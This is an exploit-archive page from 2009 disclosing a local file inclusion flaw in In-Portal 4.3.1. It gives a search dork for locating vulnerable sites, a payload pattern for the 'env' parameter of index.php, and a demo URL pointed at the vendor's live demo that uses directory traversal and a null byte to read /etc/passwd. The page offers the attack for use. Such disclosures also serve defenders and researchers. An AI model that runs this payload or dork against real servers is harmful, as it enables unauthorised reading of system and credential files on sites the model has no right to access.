[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : In-Portal 4.3.1 (index.php env) Local File Inclusion Vulnerability
# Published : 2009-08-04
# Author : Angela Chang
# Previous Title : Perl$hop e-commerce Script Trust Boundary Input Parameter Injection
# Next Title : PHP Email Manager (remove.php ID) SQL Injection Vulnerability
@ ===================================================================================@
/ Title : Local File Inclusion Vulnerability
Software : In-Portal 4.3.1
Vendor : http://www.in-portal.net/
[-] [-]
Date : 01 August 2009 (Indonesia)
Author : Angela Chang
Contact : mizz_4ng3l@yahoo.com
/
@ ===================================================================================@
[-] Dork
"Powered by In-portal"
[-] Exploit
http://[site]/[path]/index.php?env=-/[LFI]%00
[-] Demo
http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../../../../../../../etc/passwd%00
{o} ==================================================================================={o}
Greetz : -:- SkyCreW -:-
Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , str0ke
{o}===================================================================================={o}
{o}===================================================================================={o}
# www.Syue.com [2009-08-04]